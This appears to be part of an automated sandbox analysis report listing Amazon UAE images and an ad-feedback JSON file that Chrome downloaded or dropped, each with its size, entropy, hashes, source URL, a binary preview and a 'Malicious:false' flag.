                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 240x220, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):3641
                                                                                                                                                                                                        Entropy (8bit):7.6351402058950395
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:TUJt5nsTs4gzNtcaERPVf8iA/5UJwGUM4Jmn:ezzNPfZOJw1M4gn
                                                                                                                                                                                                        MD5:CA6B80C3DFB5BC6C8FB9DABFB29E1F79
                                                                                                                                                                                                        SHA1:1504F6F24651FB3A7DFFD6CFCDB38CB701B59A9A
                                                                                                                                                                                                        SHA-256:1BDEDBD7034A48FF87D629F2D8DE18A5E1F3A199237E8A70F59E05A3196B04B9
                                                                                                                                                                                                        SHA-512:D8524424E33EBAE0849586173B368D29ABC1E7AD3835E9F8EE6DEDCBA4AF1EDD3185CF778F07732BC5F848878FB7A326F7523651372EDA55A5C938E9EBEDD1B0
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........0.............................................................`........................................@'..............)^4B..t..,........o._..f...!yZn....{a.&...1.u.Wl..t-7....e|.~._8.......%..Hp..S*.Z....g...c.".k....,...R...5.....cY..R.....K.}....;...S........._...KN..kY..X.K...<h.zU~.t-&...$.zX..g.v.........#.H5.....g,.J.....-...?.<..:fx...t..|>`......W.|(.!.%......o..Kz]..r..<#I........%..>...........................................-.........................12.!0..".#@Bp $3AR...........er..9.dv.......w2l.9........9....M@...!..9t.|..;9./...JJ[.........,.m......m.Q9.qxZf.vt.6.Ng..s6.l..r.........H$.t.CIr.....,p+.M..ft6.......,Q.....SSSSSSH.hD..hh_5....].Mzt.8.Cv.odH.\0/....V..ur5q..A..o4..#%Z@w.6...|..r...X..L..P[.m.w.G......A.+...Z.E}..B..-..w.^....)....v.q.o...v..P...P.96..SP.L...
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 480x440, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):11994
                                                                                                                                                                                                        Entropy (8bit):7.872940207714583
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:Ghe5bwD7pCbKki/WPK0NS+NjEauPdPTDXa2jNW7v9/qnoDBMHMi:GWcpaRNjErtDg7Fqnodji
                                                                                                                                                                                                        MD5:FE3907394326B44B3FE29FD670C143FD
                                                                                                                                                                                                        SHA1:19577FE8F83C88D50676FDD98213120CECC6CAEC
                                                                                                                                                                                                        SHA-256:BA049DA37F6AD748B78F90F7E367307B97DC4A89C3013C0839579B68FA47B759
                                                                                                                                                                                                        SHA-512:A6305F39109B67E1C11CC97725DF8EE9913BD8837E0D66DD89C93C34AD985B5468299F76B4D44E028A58CC38404467EC40CC173ED5611EDA33FDFD078089FB3B
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:"https://m.media-amazon.com/images/I/31J42iPc2iL._SR480,440_.jpg"
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........2.........................................................................................................................................................................yl..^.gme...^ZO.....................~a.>..4cc.e.m4eD.L"....xt.o)d.D..v.s................_.x)0....k-.55......[...1t....e....h...=...............)....#...UT.E..n...M.A..AE[Dd.b...............(...."z.U.V.;...H.:Q......m..E.`......................0K..P\.h.2.K!... ...2)...................j...3).'..USU...*.L....! ...29..............z.QqH...L..S !..H.-.i.c.=..s5n...(g..T.......8.^.e.yEYDdSij.......Q9&20..u,.E.d......3y..;~..s.k....,j.Pr.&..v[e>..+M..n...s{...P]....u...%..$..,..P..V......#..=!s...}.....U..{m#.Y.G..D.l.....k..A1...;..9.Y..sO.2..}l..Z.t......Y&...+....Z.(*h..SgW....t.j.Uqy.Z.......%..B.QV.z....%$..UB...>m:^4.t..S..YW
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 142x116, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1921
                                                                                                                                                                                                        Entropy (8bit):7.700924191769921
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:TT0rZ5iEFkoP3/k2bLC2NUck3Usos/32rQbbbbbD:TMGoP5bLZNUb3/os/G0bbbbbD
                                                                                                                                                                                                        MD5:14A9590A6F74261E30CF769FA24A369C
                                                                                                                                                                                                        SHA1:8272795EDCD4D83539BCBC6E19F6DF442D2567F5
                                                                                                                                                                                                        SHA-256:C4604DFBCBA33A0A037C81EED49EBAD061A7D104D8897E7EF9F881517A04CF27
                                                                                                                                                                                                        SHA-512:750BDA44D6BB6482BBE102640D1834161BE40E690804BBE60A3856AFC40B307FB56E4CB1D1AB34D8EFFC9AA2301A3873CDBCBCB97B0220267DD01CB2BB16EDDC
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."..........x.....................................................!1.AQ."..2aqR.b....$r........................................................?...................]S.dl&V...e.=..\..................+=..K..jn5......q....;...=a.\.|.2...!..lc..|..mh>......!.....fw.3.}.....%.f.I;g|...~..<..7..r.D..b..f7.z.......ml^.7_..`.JZh.q.NyQ....T._X.RY^...n...N....;..X&.M..O.%4.1|.Xi,..`9....K^.=.....395l..v+b.........D@DD.]$..frP?.ub.Y...1....y....8.....ER..).L]..U............0.....U..,......l.........A.4.z=Y../!..'3.............X.]4.l.y1.,...e..3WZ.y..V8 s..Pf..Kr.o...4.g5..i.Q.=r..V[.~..9.2...{...`.M.../*y..*/...k...<m.=(..w..h..'....@DD......**$lQF3t.:Z..)...K-....S..$o.M......_.(f.Z.N..Q1.~.1.y...4.t...F.....f...j...TW..n..{Oc.].*....)..u>.~....wV"Tt.4..1Fu._O.=X%..h..|g...k_r.T.ki.....UHu4...9...........
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):4884
                                                                                                                                                                                                        Entropy (8bit):5.110172780441681
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:IdNQzriJcrCR9EbtGeSDOMQe67+2y0uqYT40STfKAHSTfXAp4xNpU:IYzrIcuR9Ef+V38yA04fKAAXAp4HpU
                                                                                                                                                                                                        MD5:7D3269741741CFC4DCCB32C8F3679DD6
                                                                                                                                                                                                        SHA1:DF6FA5EFA395BF86917A971FE6E4227466B769D7
                                                                                                                                                                                                        SHA-256:29FEA520110679AF9F99D8E146700CFDEC7FBAD2292A11FBD29EE182AB67A0CA
                                                                                                                                                                                                        SHA-512:D4DEB0DCB7415A21A42C367BCC10DA7E47728D19AC25C97A3C24D7B41FA2CAA5C7E9997EB7D8A1A593F7287D41D51BF65B9852C8D9C6435DADC875C24C62BD4D
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://www.amazon.ae/af/feedback-link?pl=%7B%22adPlacementMetaData%22%3A%7B%22adElementId%22%3A%22ape_Gateway_desktop-ad-center-1_desktop_placement%22%2C%22pageType%22%3A%22Gateway%22%2C%22pageUrl%22%3A%22aHR0cHM6Ly93d3cuYW1hem9uLmFlLz8%3D%22%2C%22slotName%22%3A%22desktop-ad-center-1%22%7D%2C%22adCreativeMetaData%22%3A%7B%22adProgramId%22%3A%221001%22%2C%22adCreativeTemplateName%22%3A%22Image%22%2C%22adImpressionId%22%3A%22https%3A%2F%2Faax-eu.amazon.ae%2Fe%2Fxsp%2Fimp%3Fb%3DRN6H17wn-QSCi45d7vspX9sAAAGRVkJhBgMAAAIGAQBvbm9fdHhuX2JpZDMgICBvbm9fdHhuX2ltcDEgICDhmpvF%22%2C%22adCreativeId%22%3A%22577653937781864011%22%2C%22adId%22%3A%22588415379169131844%22%2C%22adCreativeDetails%22%3A%5B%5D%2C%22adNetwork%22%3A%22cs%22%7D%7D
                                                                                                                                                                                                        Preview:{"status":"ok","html":"<a data-a-modal=\"{&quot;url&quot;:&quot;/af/feedback-form?pl=%7B%22adPlacementMetaData%22%3A%7B%22adElementId%22%3A%22ape_Gateway_desktop-ad-center-1_desktop_placement%22%2C%22pageType%22%3A%22Gateway%22%2C%22pageUrl%22%3A%22aHR0cHM6Ly93d3cuYW1hem9uLmFlLz8%3D%22%2C%22slotName%22%3A%22desktop-ad-center-1%22%7D%2C%22adCreativeMetaData%22%3A%7B%22adProgramId%22%3A%221001%22%2C%22adCreativeTemplateName%22%3A%22Image%22%2C%22adImpressionId%22%3A%22https%3A%2F%2Faax-eu.amazon.ae%2Fe%2Fxsp%2Fimp%3Fb%3DRN6H17wn-QSCi45d7vspX9sAAAGRVkJhBgMAAAIGAQBvbm9fdHhuX2JpZDMgICBvbm9fdHhuX2ltcDEgICDhmpvF%22%2C%22adCreativeId%22%3A%22577653937781864011%22%2C%22adId%22%3A%22588415379169131844%22%2C%22adCreativeDetails%22%3A%5B%5D%2C%22adNetwork%22%3A%22cs%22%7D%7D&daFlg=false&ie=UTF-8&quot;, &quot;name&quot;:&quot;shared-placement-feedback-modal-desktop-ad-center-1&quot;,&quot;header&quot;:&quot;Leave feedback&quot;,&quot;width&quot;:&quot;460&quot;}\" style=\"position: absolute; to
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 480x440, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):15597
                                                                                                                                                                                                        Entropy (8bit):7.93248728126569
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:fH+/ktpsqV5a/mUZ6qGTFXVxTuaibmW07Kt6Ak6X0u:fH+cTV2hZbGTFXqaibT05uT
                                                                                                                                                                                                        MD5:346CB736B965186C0CEFADACF2EE6337
                                                                                                                                                                                                        SHA1:16FA1C84D9ADD2C06BCD438CDB60FAECE61DF804
                                                                                                                                                                                                        SHA-256:EAEAA7F31D6701039EF4AD78B181DA87DE4D2C4B9F2A23F5B21752CF30FF8DFF
                                                                                                                                                                                                        SHA-512:3829617ADA692FA63A8DDCAF9C3BF8B4FFD64DFFD14C6C74107F3910BE1F7E8C326A3BD3E41B7B77781F214CA64C22813EA20BE5E45C2D4CF06F5408CC3289AF
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:"https://m.media-amazon.com/images/I/41xkTNTvpwL._SR480,440_.jpg"
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........5..................................................................X............(..(.\n.o...C./c:.....QA........V..P...E...E@...........z..j..5z.Z.en..(H.,C.y.#..f.....v........x..m.r.c...c7........A...........*4...4.Q.ZkS..._(.N*.X....0...c.i.+.V.^.f.Reh....SBA..$t]....-..U.n...3..,.v.P......*........h...s.G,d1M.E......;....03f..6.T...Z.F)%W.Wl...Y...WI7....mT0.)...xx..p9...5...*.....r.yG&.Z... .F..<Q.3DW.hj.....`.....$..r..9.....x.s4....IY.Q. ......5\!.......`K...5...*........#7...1..%..... ...6 .a."..........T.......8.W.Y..K.f.....Js.^..O.#..J.G...".........x7.9.1..pX..).!..r.,BA...2F.....h..Bs....b....V.(.............._.................k.1.i.S0....W...3.Wd..E<Dq..r..+T....dV..B..Q.P@V...T.!..$g...)@...P....EC.T.SF.FY.9.l{...(g......2.....0.T..6.Ay.P.d#@j(.AF.....;....i..%.@...T.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 400x400, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):50354
                                                                                                                                                                                                        Entropy (8bit):7.969356113927722
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:1536:2+BpaF79Y5UZ+C/5sjkCo0G3KD1apWtdAN+f:dBpaFAc+s5sj6aApWtdAN+f
                                                                                                                                                                                                        MD5:CCEA032C567035C0AC54F72BB8AAE20D
                                                                                                                                                                                                        SHA1:061C5C8B0C5E78A3BD58B162A1B048B576C864E9
                                                                                                                                                                                                        SHA-256:9F5E5847FBCC02B660F73B9A3C9BFC5406EE2B4268A06E331418A88C46393754
                                                                                                                                                                                                        SHA-512:CA16905E047A69133A8DA957BC92C9C2084FE042569789085BAD3ACFEE7E86343531088321F5AB684204428B5C6490BCBC0515CD040038F1FEAE6D722D8ED855
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://images-eu.ssl-images-amazon.com/images/G/39/Merchandising/BudgetStore/XCM_Manual_1349259_3986221_UAE_Budget_Store_AE_xsite_electronics_en_400x400_2X._CB644457597_.jpg
                                                                                                                                                                                                        Preview:......JFIF......................................................................................................................................................................:.................................................................................\a.....]...p.m..6..yw..T.Z..J..v....O.65...@.............l=......c.Q......v^..r...a%.!.9..yw............i..V..\...<.8..........D.6.g`m..8O.................."HZ.mt.........yP.&{F...X_.........ec..C..+1............/.lw.;&.w.@.@..........;[...E..........*.......-J....k.....=..x.......P...x.#..:r........qR..aa...8.`..V..rJ......n7"{G..............mM.r.......GT....*..o..V..p$>1.}x.>y......J....j.gm......Sr?..#H....j....s..p........mz.rO(q}{...6.+8.9U<....ls.....Fu.[[...7.yG-..Q.....v.9.A5.,..:...,...nj...~.....?......>..|..~o.._.H........!1....6........e...`.y.....{.t.....o.."f..l:...`.K.25.7.................Q....2'~..=?x...X..?.,..s3..9.&o.+^.......p......7....xs....[...`...W.}.B..%.`.....3..6q...@.....
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 300x250, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):39516
                                                                                                                                                                                                        Entropy (8bit):7.972024116551709
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:768:xiqBv1n0WFDVzIk6a6XG8kPaq6Oxqp7YNLFFjCA9gfpn11KusA5q423q1:Dtn0YVzIla6W8Q64q9Y3FX9cp1ls+qxK
                                                                                                                                                                                                        MD5:C67B003EAD831C68E0FF99D36099E1A3
                                                                                                                                                                                                        SHA1:1513958AC2F0A22C952F6DE05178A1F3FBCE056C
                                                                                                                                                                                                        SHA-256:D5A9CB812FE2A02197421420D1802E038CAF7EF079E262D003EC1F23E73D0E75
                                                                                                                                                                                                        SHA-512:CF06A5C33B72F16CA1157A4CDB9B95C22C2174ED67D6BA10DAA25228F578A5D48338E80AB9F6C3464E59BA62FD6834BA196830D1F6BAE14F595484213F99A42E
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF.............C....................................................................C.........................................................................,..............................................T..............................!.1."AQ.2a.#Bq.$R..b....%349Sr...67CTcsuvw.............................................I..........................!1A.."Qaq..2....BR....#b...4r.....$Sc.5s%3...............?..~...%.(.DJ"Q...D.%.(.DJ"Q...D.%.(.DJ"Q...D.%.(.DJ"Q...D.%.(.DJ"Q...D.%.(.DJ"Q...D.*..p.L.FV......_.;%H#.gZ.x...-...S.....e.P....1. P..5.....6.T.R.y..../...m=....W.};.+..U......QX.d.+g.t......... ^&.....i.sJ.C. y.........m.%.'.|...X..OMm=..P.V......t..W....=.&R..Fq.......Y....fL...w...W.?...7.4....w.V.S...X..y.7.#....Ts.v.:wY......g..4Ceh...W.,.le.#*H.C..-R&.JpQ.A.R0..P1H.pz...P-o..s.{.p.1;.J....q{.o.Y......OL<Mn..C.2..N@..$,+.=..[..l.v.<Y.D}.f.~@M4LE...16.R.X~-..<.;i.q......0.8.d........^............i...`.......U.\[.X..P2.A.U..=.`.....c.z.Qc..........7....}..
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 186x116, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):2504
                                                                                                                                                                                                        Entropy (8bit):7.683203594367942
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:q0fVRckJT428RUXeB6hSTJpau2y2xFNaxGIkamZRUsKenYpP94jbyqg2:JNRcM1zhETjVsFkuamZRUsOP9Dqz
                                                                                                                                                                                                        MD5:F90AA3D3F370FAF9FA196089CD86EEF9
                                                                                                                                                                                                        SHA1:4B1D37029773AC6C057C774954EB0C83B647FE23
                                                                                                                                                                                                        SHA-256:E59FC503FD4CC663A537D942E7FE4CC5D05BD505C22BEFA575A9B9263C08F30B
                                                                                                                                                                                                        SHA-512:4896EC010B3F83A5D41FE00A3D7139C3ED868E7C9893326B01C6270557B153244E4362D32C084451B807F0F312D131C4B1D197195CAB996BC15C9578248C52B3
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://images-eu.ssl-images-amazon.com/images/G/39/AHS_UAE/2024/UDS/GW/QC/Furniture/XCM_CUTTLE_1690813_3610032_186x116_1X_en_AE._SY116_CB582137121_.jpg
                                                                                                                                                                                                        Preview:......JFIF......................................................................................................................................................t...."..........7......................................................................q`...=.E+.YC.............:.S.s!h;o'a?\..]...l.........g...t}.....}....R.z3$.o........=..Y...B.h....!Ku|.nZwT....;k.l ......V......SUR..12..~rW.)=,.Bd.....i.&..b.~../.z'&^L.J.....T&@......3,.................?...9............................#3..$@CS.....s!"14DPc...AB.........?..E.Y...t..e6KH.......h..'HX...fK.......- ....Gv......vV..k.~..g....a.Y..,q).OP......g........^.dL<..+,....1.y.[...oQ1(./.0.....(..........q.<..Az..+*...A..b.lwK.W9...YK.....O...Zae.D.ef."....."t.2yM.:..4......R.k&.......$...B..._mQ[.....r~bY.3qb,.O.[......bY..^.e^W...B...{b.3...G.=P.X..K.TYu.m...2....H.)..8..*.Io.....^....Wv.d.F>...J....'._).m-..G+....w....Q7......lWq.....rQ.4...b....V.Or.V...K+.DD2..D};_'..........kQ..."..E.h..~..
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 240x220, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):3635
                                                                                                                                                                                                        Entropy (8bit):7.615701087509504
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:T6GPYESDpwbD2R0wEAbREFNSHeyySeBKXn+itqN3n:2zD8swpvS+QeBKX+i0n
                                                                                                                                                                                                        MD5:3DA1DB8430FEBA55945E13325A930C10
                                                                                                                                                                                                        SHA1:CCD9C22CEBE2867332A6912D42191239B22A17D8
                                                                                                                                                                                                        SHA-256:03B37001C4258519F5D19B2D87A65873388D30F936E6D774F771E47DCCAB4D64
                                                                                                                                                                                                        SHA-512:E1F44D6AA5041885C630D6A404EEA125992D2193629D1654B1605103506AB653F4DB068D9E64AA1F183A1B27A50A91A7C7ECC34BF5B9E8B85C4E9E24CFDDE5DE
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."........../..............................................................................2...$..............]e.]*g...qTU.Nc4d@.............o.!.[dQ....Nb........"\m.x".....>.4c......d.W........d...3..V..e.e+.MM."3.C........k.l.z.....af7gBv...Q.p........9..V......kj.k.4.G.).vD..............T.pYF-$..|...H........b9.~s...'....%/.N..4.J...........0;.3..eH.n>}n.h.rs6.]............G;#\...>O6.l.}l,Y-...........G$..........................,........................@.. !1."2A.#Q`a3BR...........!.x......:A.V.<.2b..k...)!..n'}....i.T.q.....e...TC..qkf...cc.....W..r......C...U...J.o7=....d..0........8H-..*.>Z....vw`=|.T..m..M.>i.~M.B..8....'$?.E.C!.~.... .O.\.y....{......\;..c..F;...r....I.C. .g.k...[^+&......j>MV.\.Q..w..YuI..FM^7..t....5F*...'H.J..=..f...Z5j.Qk..(..q)4Dh.L......]l.H3K....,..j...-F.5b.|.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 87x200, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):3108
                                                                                                                                                                                                        Entropy (8bit):7.868819572119106
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:TnthdkVwLRKJJimma4xb9x5e3u6895AWMB:rt0VOGwFaC9x5Qf895A5B
                                                                                                                                                                                                        MD5:DB34CFB5BF7D9326D9B47FC8B887B009
                                                                                                                                                                                                        SHA1:724419CD452C367C7C5E4488FC69FB4573DC8667
                                                                                                                                                                                                        SHA-256:B5573FDBD33E9CC647FB61BD382013C0A5CFDA897109A5E36E66CBD8705D7432
                                                                                                                                                                                                        SHA-512:16649B873CBB36ABCC7842A3D8B358CDDEC6EDA5EE62291C2F42FFD27ED4D73E4E37ED64F9F4957435C8B98DF0195F9840830A7833AA67EA631E3EC7688C444D
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........W.."...............................................................!1..AQ...#2Saq......"RTr...BC.b...s.............................................1A.!............?..R....1X.w.ty..b.v..5.j...qb.cU.v.;[.>x/y.w2..HT....+.X.E; *..o.....m...r....$!...jg...V..7...M.k._..%.........j....Hp..N[....[rz%..c.J.I.hj#.d,..$.a.........Tva<...K.y..E/...uKc.T.I.~{5....+_o.f....6.t..!' ......2 ."}..iGe.(6.1kv..>.G...IVMJ0:u.kU.....[....=.C..v..i..H..[...*t..kH.1v...B..i..z^T..Z..9E..ZH.Q..Oa:..o.Z.TYRz...D.q;..-.Gy.k...#).........Oa'...q.1<b.!.Z..#.8..j....}..Y|....Z..".bU^.2.".w(..f.\u......S..O.XH=.V..).3=g6..]$..4W.9\s..-D#hkA...~.{/.*/g.s..O.Y\.....N..}B..B.......g...X..%...O,&.x...-.,..5...yc....x...T [.o!..q..B.W.Fu;.....mu.1$..Y....H,W.'A.v=....A3..............G.T.I.j....{*...m.gm...y_..Lk...-....=W.~`T./J.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:PNG image data, 194 x 295, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):45977
                                                                                                                                                                                                        Entropy (8bit):7.985058314720174
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:768:Ox2kO+0B5izHhTPdZVliVcR3+/ku/iUYi09ERbCC4lxOQ3JZT9AlpsyjSB:OAkp45izBXfNR35u/izi2GbHU3X9An8B
                                                                                                                                                                                                        MD5:A824C7A90E2C465DA4C4DB9FD9FC15E4
                                                                                                                                                                                                        SHA1:36F46FBD4D03D1E55BC0B0D4381D351620750532
                                                                                                                                                                                                        SHA-256:6641FF165206F0F54CD94518DED93DFCBFC7436A806B0DE96991CB3DA4032A8B
                                                                                                                                                                                                        SHA-512:AF530AF8E111A8B7DA4C2776253E6BDFD295E2A84A11EBCC020024E6B8364C6D75AC2C8BAE725D6441036BB3F163E74410F87F9C9B031417F16DA330C5C708DC
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://m.media-amazon.com/images/S/sash/Z8YwjOjqIHxqujG.png
                                                                                                                                                                                                        Preview:.PNG........IHDR.......'.............gAMA......a....KiCCPsRGB IEC61966-2.1..H..SgTS..=...BK...KoR.. RB..Ti........@...."....q....."..A...y.(..(6T....}..7o....9g..}>.F`.D....dJ....<6..'w..T ...@.-.................m@..n....8..P.....$......B....2r.2..2...t...%..[.....j..;e.O..v.$....(S*.@..@&.......X......`.(..s....`....`....).d....`...S......GE...3.(...x.W\!.S...d..T.n!...\].x.87C.P........ee......3...FvD.....9;.:;.8.:|...........?........E..............e..../.....B.._......T.B.fg...k+..m.._......_.....................2..r<[&..q.?......wL..'..b.P.GK..i....$.I...H.........k.`.~..B[P..... ..%....w......1...w..0....h....................4P.6h.>....#..;x...P..8X.BH.L.C.,.UP.%...B..Z..F8.-p.........<.^...0.o`.A.2.DX.6b..".#.Ef!~H0...!.H."E..Rd5R..#U.^....9..E.!=.=...F~C>...@..j..\...B...h....G...h%Z..B.......>G.0....3.l0...B.x,..c.b......6.....b#.{..."....;!.0. $,",'..........B.a...$....nD>1..B.%..+.u.c...[.......!..\H..8R.i......D:C.!....d.6..A.%...r.y;...
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 226x200, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):8744
                                                                                                                                                                                                        Entropy (8bit):7.89403623666893
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:EWfV2BSNoNVAn2vfrcIjJICAtiHpvCovSSZ0FLB4nL/:z2BCtRI1IT8HpvFSjdB4z
                                                                                                                                                                                                        MD5:39F55DBD6DA30352041C6044273F5D95
                                                                                                                                                                                                        SHA1:711289A718E92EB7329FFD26A05B714310C3CB5C
                                                                                                                                                                                                        SHA-256:74E0560DCB790E003A2007F1B1CEF52A10CB7A3A29A84313B222FA99F8FC9B53
                                                                                                                                                                                                        SHA-512:AA4D86DE66B6873D626EC37734FF3301C64121313219DCED1CA3E16A192C5418761CA0F505A314F56A544DDCE7B3DEB2C4A7DD7ED08E782973FB9ADE9A045AD2
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://m.media-amazon.com/images/I/61v-DUo-vZL._AC_SY200_.jpg
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."........................................................................$=."2.8..$=..O...?...\K...x.%..P.x.x...4:7.K....p.RQ....9....f0....I...."l..kI. q.A.:....I.P..._7.5...W.4.....y~s..AkXg.....T....C..?V'.....H..#.f.z)...f.$..!$$..I^......B..!.r....B<... C..'C!..VXK..,...%..vFCHNhF.A6D....K...ft.O....@....KGrB..G.....S./.k.+.....N.<r.hm..^..7...\>..h...B....y.H..Z~r.....@.D..q.J.e..A.%.*oFq:.Q.D....B..X].%..%...@.*g.8.........03.#u1k=........Y.IvL9.....gUY...V..}...2...0.kF..s=.buy.9.nt.t>w..s....X".O....@.<...Vi*!..,e.6h+....=.[G".A.A..........%.Gj:.......Th..11.I.aH..p'..........)....b.'.Q...&..@.....1$.!.v...y.......47p.....Hp&...5.{.i"y_... ._NN4....r..p4.S#..1W...$.:F.Z..r@.$a.:A."..#-.... .bA...G...)......................1..A.!2Q. ".#3BaR...........v_G...z..v]........v_U..~..8....O.U
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 179x200, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):8266
                                                                                                                                                                                                        Entropy (8bit):7.940000747842392
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:DPVX9ktFG72fdxySrkHttepDJM/uP02pVWfgpnDuPteQ7TXFow:TVitcCfdxypDepDJMGc2p7paAQ7TXFB
                                                                                                                                                                                                        MD5:79872601D67F592BFB2DC1FC1EA304D7
                                                                                                                                                                                                        SHA1:78811167AC1725F957C9ECAF00D72A890F47D9DA
                                                                                                                                                                                                        SHA-256:12A4D2D30CDC79A44C20924902251480BE15690664966774F5AA8AE1FDBFEE4B
                                                                                                                                                                                                        SHA-512:BD02A562F0F9640F674F7053D88F7515C4E2ECA1076DE75AA018F00A43513E68D6A08DE4D35A62C8A10A5E794547F62B8B95A890984180A960D01B75FCAC7FC0
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
